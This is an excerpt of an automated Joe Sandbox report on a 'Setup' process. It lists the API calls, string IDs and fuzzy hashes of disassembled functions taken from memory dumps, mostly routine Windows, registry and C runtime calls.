                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                              • String ID: KERNEL32.DLL
                                                                                              • API String ID: 637971194-2576044830
                                                                                              • Opcode ID: 082f556e15c90d1bc2a7ab817fac5a47227d2da3cf024c697bc1ea98d701b47b
                                                                                              • Instruction ID: 660dfb9aeecbae2082d393e432b22b24226b8faaa44ab1bbe2079d209412818d
                                                                                              • Opcode Fuzzy Hash: 082f556e15c90d1bc2a7ab817fac5a47227d2da3cf024c697bc1ea98d701b47b
                                                                                              • Instruction Fuzzy Hash: 86016D71806B01AEF720DF65D94474AFBF0AF56B68F20890ED49697290CB70EA40CF14
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 639728B0
                                                                                                • Part of subcall function 63969BE0: __getptd_noexit.LIBCMT ref: 63969BE3
                                                                                                • Part of subcall function 63969BE0: __amsg_exit.LIBCMT ref: 63969BF0
                                                                                              • __getptd.LIBCMT ref: 639728C1
                                                                                              • __getptd.LIBCMT ref: 639728CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                              • String ID: MOC$RCC$csm
                                                                                              • API String ID: 803148776-2671469338
                                                                                              • Opcode ID: c95cb452513ca19a93679836afc226ef36163cfd16b51e0311ae908c2184dada
                                                                                              • Instruction ID: 52ccf8b34fe6be199a4585349706aba3ab425332e65ab83197959d0c55e54485
                                                                                              • Opcode Fuzzy Hash: c95cb452513ca19a93679836afc226ef36163cfd16b51e0311ae908c2184dada
                                                                                              • Instruction Fuzzy Hash: 0DE012341282048FD7209774C09579833ECFF89B98F5914E5E45CCB3A2CB35E4908E52
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D82E7
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C5D82F8
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C5D8324
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 6C5E0D27
                                                                                              • ctype.LIBCPMT ref: 6C5E0D8E
                                                                                                • Part of subcall function 6C5D7C62: memmove.MSVCRT(?,?,?,?,?,6C5D8320,00000000), ref: 6C5D7C93
                                                                                                • Part of subcall function 6C5DE3B3: EnterCriticalSection.KERNEL32(?,?,00000000,6C5D83DB,?), ref: 6C5DE3BD
                                                                                                • Part of subcall function 6C5DE3B3: ctype.LIBCPMT ref: 6C5DE3CC
                                                                                                • Part of subcall function 6C5DE3B3: LeaveCriticalSection.KERNEL32(?,?,00000000,6C5D83DB,?), ref: 6C5DE3EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeavectype$ExceptionRaisememmovememset
                                                                                              • String ID:
                                                                                              • API String ID: 1998214256-0
                                                                                              • Opcode ID: 0827f9c953721f8cd43fad442b37ee44db180ab04209c350d345a411fdf4bc3e
                                                                                              • Instruction ID: 410892f303506308c51a4e534cd270f29b82f388331f718135a9fec6adc958a0
                                                                                              • Opcode Fuzzy Hash: 0827f9c953721f8cd43fad442b37ee44db180ab04209c350d345a411fdf4bc3e
                                                                                              • Instruction Fuzzy Hash: FD81AD30200380DFCB14DF58CD84E9A7BF5BBC9308F66449AE6698BAA0CB31E945DF44
                                                                                              APIs
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?,00000000,?,?), ref: 6C5E8442
                                                                                              • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 6C5E8464
                                                                                              • GetLastError.KERNEL32 ref: 6C5E8488
                                                                                              • SetNamedSecurityInfoW.ADVAPI32(00000001,00000001,80000005,?,00000000,?,00000000), ref: 6C5E84B5
                                                                                              • GetLastError.KERNEL32 ref: 6C5E84FE
                                                                                              • LocalFree.KERNEL32(?), ref: 6C5E8527
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Security$DescriptorErrorLast$DaclFreeInfoLocalNamedOwner
                                                                                              • String ID:
                                                                                              • API String ID: 442303658-0
                                                                                              • Opcode ID: e1b71975f8727b4f3bab825058cacc4fa325fa138d223693f34041932b00c253
                                                                                              • Instruction ID: a30583fc26b3c69e13f0bd10709da5f3149cfb0863d6791cf07ec38621560159
                                                                                              • Opcode Fuzzy Hash: e1b71975f8727b4f3bab825058cacc4fa325fa138d223693f34041932b00c253
                                                                                              • Instruction Fuzzy Hash: C551BD30645258BBCB42CE48CC44F9A3BB9FB49319F650057F920EA962DB71DA85CF92
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D8097
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue_vsnwprintfmemset
                                                                                              • String ID: d]l$%s\%s$Software\Microsoft\SQMClient$Software\Policies\Microsoft\SQMClient$StudyId
                                                                                              • API String ID: 908408749-1776563523
                                                                                              • Opcode ID: ae6e23c033e2f88602d234b67d8572ae7b307014e52e7f9370d212c97cfd713a
                                                                                              • Instruction ID: c448c25e8b352762344663eca828d2bc6f2b4b57e00b222e7602f6c6889f2531
                                                                                              • Opcode Fuzzy Hash: ae6e23c033e2f88602d234b67d8572ae7b307014e52e7f9370d212c97cfd713a
                                                                                              • Instruction Fuzzy Hash: 3B310BB1902358BAD710CB9C8C84FEB77ACEF55348F52049AA924D6951C370FD88CF99
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 63963BCA
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000698,639603E4,00000000), ref: 63963BE0
                                                                                                • Part of subcall function 6395F6DE: __EH_prolog3_GS.LIBCMT ref: 6395F6E8
                                                                                                • Part of subcall function 6395F6DE: _memset.LIBCMT ref: 6395F714
                                                                                                • Part of subcall function 6395F6DE: _memset.LIBCMT ref: 6395F741
                                                                                                • Part of subcall function 6395F6DE: GetVersionExW.KERNEL32 ref: 6395F75A
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 63963C44
                                                                                              • GetSaveFileNameW.COMDLG32(?), ref: 63963C4C
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 63963C73
                                                                                              • _memcpy_s.LIBCMT ref: 63963CE8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryFileH_prolog3_Name_memset$OpenSaveVersion_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 133044998-0
                                                                                              • Opcode ID: d30e2f93c4a5ff490e7b5a22fb0af39fa60d86fff0fa530bb4a3839e5c563ff9
                                                                                              • Instruction ID: f1804955050dd90aa353e9a8e83468534592de68f0d06fdca5661cb5d7b9ada3
                                                                                              • Opcode Fuzzy Hash: d30e2f93c4a5ff490e7b5a22fb0af39fa60d86fff0fa530bb4a3839e5c563ff9
                                                                                              • Instruction Fuzzy Hash: 9941B071906218DFEB20DB20CC88B89B7B9BF56714F4041E9E018A71A1CB36DAA0CF50
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D81EC
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue_vsnwprintfmemset
                                                                                              • String ID: d]l$d]l$%s\%s$CabSessionAfterSize$Software\Microsoft\SQMClient
                                                                                              • API String ID: 908408749-2596333453
                                                                                              • Opcode ID: f8d5043834132f02cf131cd395810f645e73dcff39e015370ab480b6c2309668
                                                                                              • Instruction ID: cf3074ed755ae8c6e0bd18e93db2ee122679fa2fd86b60c0efc2af8b83709143
                                                                                              • Opcode Fuzzy Hash: f8d5043834132f02cf131cd395810f645e73dcff39e015370ab480b6c2309668
                                                                                              • Instruction Fuzzy Hash: 2731F534505308AFDB14CE0DCC85FDA77A9BB84318F660496E925D7952C370ED888F9A
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,?), ref: 6C5EA581
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 6C5EA5A7
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6C5EA5B9
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,?), ref: 6C5EA5CC
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 6C5EA5EB
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6C5EA5FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 7ac682e0dc46e0febf53556dd6ab469f962ff80b4442477df797bde144a5af77
                                                                                              • Instruction ID: 639e8a583afebb472a8561b65b10950ea5ba39db8afc33e0ab6e9049b651c6e0
                                                                                              • Opcode Fuzzy Hash: 7ac682e0dc46e0febf53556dd6ab469f962ff80b4442477df797bde144a5af77
                                                                                              • Instruction Fuzzy Hash: 6C2123B6900248FBDF11DFA2DD44DCF7FB9EB89324F108162BA14A6010D731DA54EB60
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 6C5D87CF
                                                                                              • MsgWaitForMultipleObjects.USER32(?,?,00000000,?,000004FF), ref: 6C5D87F9
                                                                                              • GetTickCount.KERNEL32 ref: 6C5D880B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$MultipleObjectsWait
                                                                                              • String ID:
                                                                                              • API String ID: 459475419-0
                                                                                              • Opcode ID: fcf60fa78c012e9a2eca72975cca5bfbbefb59c310f5ffc326e83c7f4afb05e1
                                                                                              • Instruction ID: 280a5f886e6216860644d2d8815488ead630c4eba4f6e6f390ba339aaa339600
                                                                                              • Opcode Fuzzy Hash: fcf60fa78c012e9a2eca72975cca5bfbbefb59c310f5ffc326e83c7f4afb05e1
                                                                                              • Instruction Fuzzy Hash: 5A214C71900249EFCF00DFA9CC84EDE7BB9EB09364F128552EA10E6550C731EA95DBA9
                                                                                              APIs
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CAC
                                                                                              • CloseHandle.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CC0
                                                                                              • CloseHandle.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CCD
                                                                                              • CloseHandle.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CDA
                                                                                              • DeleteCriticalSection.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CE3
                                                                                              • EnterCriticalSection.KERNEL32(?,00000004,6C5E630E,6C5F0168,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8C93
                                                                                                • Part of subcall function 6C5E8958: free.MSVCRT ref: 6C5E8964
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCriticalHandleSection$DeleteEnterLeavefree
                                                                                              • String ID:
                                                                                              • API String ID: 2998865046-0
                                                                                              • Opcode ID: 9bb7c00d6a59f4a6aa82939cebc7a0e8a90bd5e6aca13789d0bb36338a45ba55
                                                                                              • Instruction ID: 750f2ed07a123dcf8bec678bc80579b0f65f294bbf678b8e99c705f683c421ab
                                                                                              • Opcode Fuzzy Hash: 9bb7c00d6a59f4a6aa82939cebc7a0e8a90bd5e6aca13789d0bb36338a45ba55
                                                                                              • Instruction Fuzzy Hash: 111118B0502705CBCB20EFAACD8459AB7F4BF59308751082ED186D7E50DB75F988CB16
                                                                                              APIs
                                                                                              • __CreateFrameInfo.LIBCMT ref: 63972B8C
                                                                                                • Part of subcall function 63972542: __getptd.LIBCMT ref: 63972550
                                                                                                • Part of subcall function 63972542: __getptd.LIBCMT ref: 6397255E
                                                                                              • __getptd.LIBCMT ref: 63972B96
                                                                                                • Part of subcall function 63969BE0: __getptd_noexit.LIBCMT ref: 63969BE3
                                                                                                • Part of subcall function 63969BE0: __amsg_exit.LIBCMT ref: 63969BF0
                                                                                              • __getptd.LIBCMT ref: 63972BA4
                                                                                              • __getptd.LIBCMT ref: 63972BB2
                                                                                              • __getptd.LIBCMT ref: 63972BBD
                                                                                              • _CallCatchBlock2.LIBCMT ref: 63972BE3
                                                                                                • Part of subcall function 639725F6: __CallSettingFrame@12.LIBCMT ref: 63972642
                                                                                                • Part of subcall function 63972C8A: __getptd.LIBCMT ref: 63972C99
                                                                                                • Part of subcall function 63972C8A: __getptd.LIBCMT ref: 63972CA7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                              • String ID:
                                                                                              • API String ID: 1602911419-0
                                                                                              • Opcode ID: 040182913ab5de98d4dce59afaca3a70b7968be2db1773c273ac280849929d72
                                                                                              • Instruction ID: 9c1394e14e9519593cafc61dd97b0bda55c1ff84ffc63a416d129727c82e7a37
                                                                                              • Opcode Fuzzy Hash: 040182913ab5de98d4dce59afaca3a70b7968be2db1773c273ac280849929d72
                                                                                              • Instruction Fuzzy Hash: 3A1107B5C1530ADFEB00DFA4C944BAEBBB0FF15754F108069E854A7250DB389A11DF90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63964251
                                                                                              • SetWindowLongW.USER32(?,000000F4,00000069), ref: 63964265
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 639642A1
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,00000069), ref: 639642AC
                                                                                              • GetParent.USER32(?), ref: 639642B9
                                                                                              • GetDesktopWindow.USER32 ref: 639642BE
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: a6ebe9de4f26a2b86282e5b72dac04022ea02fd7e7ed7c6b9c8c7512852fd6e5
                                                                                              • Instruction ID: a39ec2e0998b255661f4ad1714907740d87353214291cac652ae6b9055b0b046
                                                                                              • Opcode Fuzzy Hash: a6ebe9de4f26a2b86282e5b72dac04022ea02fd7e7ed7c6b9c8c7512852fd6e5
                                                                                              • Instruction Fuzzy Hash: 00111874900308DFDF20AFA9C94499EBBF8BF5AB04B10451AE126EB2A0DB71D910CF50
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63963A7D
                                                                                              • SetWindowLongW.USER32(?,000000F4,0000006B), ref: 63963A91
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 63963ACD
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,0000006B), ref: 63963AD8
                                                                                              • GetParent.USER32(?), ref: 63963AE5
                                                                                              • GetDesktopWindow.USER32 ref: 63963AEA
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: 95af4ff55f6d7a7b2d59f19c133c1d84735e43af08f9bcd8030d9938ce443491
                                                                                              • Instruction ID: 6b25dc754c33decd24fa88492e277dd6b36f84d50a184d394dbc04bcd0331d56
                                                                                              • Opcode Fuzzy Hash: 95af4ff55f6d7a7b2d59f19c133c1d84735e43af08f9bcd8030d9938ce443491
                                                                                              • Instruction Fuzzy Hash: 41111870900704DFDB20EFA9CD8499EBBF4BF5AB04B10451AE126EB2A0DB71D910CF54
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63964107
                                                                                              • SetWindowLongW.USER32(?,000000F4,0000006A), ref: 6396411B
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 63964157
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,0000006A), ref: 63964162
                                                                                              • GetParent.USER32(?), ref: 6396416F
                                                                                              • GetDesktopWindow.USER32 ref: 63964174
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: 618507b14a1ce9565b7e36fbefd0475689d7223784afee1453b562edae93d3e8
                                                                                              • Instruction ID: c42adb19be6ba8230251e46b6a8dcf4ac93a292687e12a442f040d0b3654a854
                                                                                              • Opcode Fuzzy Hash: 618507b14a1ce9565b7e36fbefd0475689d7223784afee1453b562edae93d3e8
                                                                                              • Instruction Fuzzy Hash: A0111C70A00304DFDB10EFA5C94499EBBF4BF6AB04B10451AE115EB290DB71D910CF50
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63963FD5
                                                                                              • SetWindowLongW.USER32(?,000000F4,00000067), ref: 63963FE9
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 63964025
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,00000067), ref: 63964030
                                                                                              • GetParent.USER32(?), ref: 6396403D
                                                                                              • GetDesktopWindow.USER32 ref: 63964042
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
